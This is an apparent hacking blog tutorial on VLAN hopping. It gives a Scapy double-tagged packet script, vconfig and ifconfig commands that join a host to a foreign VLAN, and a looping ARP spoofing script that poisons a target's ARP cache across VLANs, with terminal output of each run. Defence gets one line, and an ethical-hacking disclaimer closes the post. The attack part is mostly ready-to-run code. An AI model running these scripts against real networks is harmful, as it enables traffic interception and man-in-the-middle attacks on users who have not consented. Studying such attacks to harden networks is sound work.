VLAN
A VLAN (Virtual Local Area Network) separates several networks on a logical base. Only devices on the
same VLAN can see each other. VLANs where invented to define a networks
structure independently from its physical hardware, to prioritize connections
and to minimize broadcast traffic. They were not developed with security in
mind, but its a common myth that VLANs can add to your security. Don’t rely on
this myth, because several ways exist to circumvent the separation of a
VLAN.
Switches implement VLANs in two different ways:
through tagging of packets using a IEEE 802.1q Header. see the below image, that’s inserted after the
Ethernet header or simply defined by port.
802.1q is a newer variant, which allows the creation of a VLAN
spread over several switches.
VLAN Hopping
VLANs are no security feature as already mentioned, because the
additional security of a modern, tagged VLAN on the one hand depends on a
header added to the packet including the VLAN Id. Such a packet can be easily
created with Scapy. Lets say our computer is connected to VLAN 1 and wants to
ping another one on VLAN 2.
#!/usr/bin/python from scapy.all import * packet = Ether(dst="c0:d3:de:ad:be:ef") / \ Dot1Q(vlan=1) / \ Dot1Q(vlan=2) / \ IP(dst="192.168.13.23") / \ ICMP() sendp(packet)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ sudo python3 vlan.py . Sent 1 packets. ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ sudo python3 vlan.py . Sent 1 packets. ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$
First we set the header including our VLAN tag into
the packet and afterwards the one of the destination host. The switch will
remove the first tag, than decide how to react on the packet, seeing the
second tag with VLAN Id 2 he decides to forward it to that vlan. On some
switches this attack will only be successful if its connected to other VLAN
enabled switches via stacking, because otherwise they
use port based
VLAN.
Let’s Play Switch
Linux runs on a lot of embedded network devices; therefore it
should not be surprising that one can turn their own computer into a full
featured VLAN switch thanks to Linux. All you need is the tool
vconfig. After installing the required
packet depending on
your distribution you can add your host to another VLAN with the following
command.
vconfig add eth0 1
Afterwards you must remember to start the new device and
give it an IP address of the VLAN network!
ifconfig wlan0.2 192.168.13.23 up
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ ifconfig wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.21.25 netmask 255.255.255.0 broadcast 192.168.21.255 inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc prefixlen 64 scopeid 0x0<global> inet6 fe80::aa80:f129:e78d:aa96 prefixlen 64 scopeid 0x20<link> ether fc:01:7c:29:00:77 txqueuelen 1000 (Ethernet) RX packets 63482 bytes 39443272 (37.6 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 58826 bytes 15548253 (14.8 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ sudo vconfig add wlan0 2 Warning: vconfig is deprecated and might be removed in the future, please migrate to ip(route2) as soon as possible! ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ sudo ifconfig wlan0.2 192.168.13.23 up ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ ifconfig wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.21.25 netmask 255.255.255.0 broadcast 192.168.21.255 inet6 2409:4064:2001:6d85:775:f2bc:96b8:70fc prefixlen 64 scopeid 0x0<global> inet6 fe80::aa80:f129:e78d:aa96 prefixlen 64 scopeid 0x20<link> ether fc:01:7c:29:00:77 txqueuelen 1000 (Ethernet) RX packets 64616 bytes 39837956 (37.9 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 60023 bytes 15811522 (15.0 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.13.23 netmask 255.255.255.0 broadcast 192.168.13.255 inet6 fe80::fe01:7cff:fe29:77 prefixlen 64 scopeid 0x20 ether fc:01:7c:29:00:77 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 9 bytes 726 (726.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$
ARP Spoofing Over VLAN Hopping
VLANs limit broadcast traffic to the ports belonging to the same VLAN therefore we cannot by default react to all ARP requests but have to proactively tell the victim our MAC every few seconds like seen in the first ARP spoofing example. The code is identical except for the fact that we tag every packet for our and than additionally for the destination VLAN.
#!/usr/bin/python import time from scapy.all import sendp, ARP, Ether, Dot1Q iface = "wlan0" target_ip = '192.168.13.23' fake_ip = '192.168.13.5' fake_mac = 'c0:d3:de:ad:be:ef' our_vlan = 1 target_vlan = 2 packet = Ether() / \ Dot1Q(vlan=our_vlan) / \ Dot1Q(vlan=target_vlan) / \ ARP(hwsrc=fake_mac, pdst=target_ip, psrc=fake_ip, op="is-at") while True: sendp(packet, iface=iface) time.sleep(10)
Luckily its not that complicated to protect against those kind of VLAN attacks: Just use physically divided switches if you really want to separate your networks!
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ sudo python3 vlan-hopping.py 1 ⨯ 1 ⚙ . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. ^CTraceback (most recent call last): File "/home/hackerboy/Desktop/python/mymodule/vlan-hopping.py", line 20, in <module> time.sleep(10) KeyboardInterrupt ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$
If you want change MAC address of vlan (like wlan0.2) then you can use this command :-
sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77
- Wlan0.2 is our vlan interface.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ sudo ifconfig wlan0.2 hw ether fc:01:7c:29:00:77 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$ ifconfig wlan0.2: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.13.23 netmask 255.255.255.0 broadcast 192.168.13.255 inet6 fe80::fe01:7cff:fe29:77 prefixlen 64 scopeid 0x20 ether fc:01:7c:29:00:77 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 23 bytes 1692 (1.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule] └─$
I hope you liked this post, then you should not forget to share this post at
all.
Thank you so much :-)
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.